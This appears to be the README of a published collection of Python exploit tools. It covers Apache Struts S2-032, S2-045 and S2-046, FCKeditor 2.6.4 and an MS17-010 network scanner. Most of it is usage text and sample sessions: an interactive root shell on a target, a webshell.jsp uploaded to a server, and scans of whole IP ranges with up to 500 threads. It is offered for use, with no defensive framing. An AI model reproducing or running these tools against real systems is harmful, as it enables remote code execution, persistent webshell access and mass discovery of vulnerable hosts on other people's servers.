Exploits (EXP) written in Python. I'll publish the popular ones here.
usage: s2-032_all.py [-h] [--cmd] [--url URL] [-f FILENAME] [-d SHELLNAME]
CVE-2016-3081 | Apache Struts S2-032
optional arguments:
  -h, --help    show this help message and exit
  --cmd         drop into shell-like RCE
  --url URL     specifiy the url of the target
  -f FILENAME   specifiy loacl filename of the file you want to upload
  -d SHELLNAME  specifiy remote filename upload on the server
Use it like this:
python s2-032_all.py --cmd --url http://localhost/hello.action
# whoami
root
# \q
Bye!
python s2-032_all.py -f wanger.txt -d webshell.jsp --url http://localhost/hello.action
File upload success!
http://localhost/webshell.jsp
usage: s2-045_cmd.py [-h] [--cmd] [--url URL]
CVE-2017-5638 | Apache Struts S2-045
optional arguments:
  -h, --help  show this help message and exit
  --cmd       drop into shell-like RCE,enter \q to exit
  --url URL   specifiy the url of the target
Exploit for FCKeditor <= 2.6.4 (PHP)
Usage: python fckeditor.py "http://127.0.0.1/fckeditor"
Another attack vector for CVE-2017-5638
CVE-2017-5638 | Apache Struts S2-046
optional arguments:
  -h, --help  show this help message and exit
  --cmd       drop into shell-like RCE,enter \q to exit
  --check     check the target
  --url URL   specifiy the url of the target
Scanner for MS17-010. Supports a single IP, a CIDR range, or an IP list file,
and scans with 1-500 threads (default 100).
Scan using 100 threads (default): ms17010_scan.py 192.168.1.1/24
Scan using a thread count (1-500) of your choice (e.g. 200): ms17010_scan.py 192.168.1.1/24 200
Scan the IPs in a file using 100 threads: ms17010_scan.py -f iplist.txt
Scan the IPs in a file using a thread count (1-500) of your choice (e.g. 200): ms17010_scan.py -f iplist.txt 200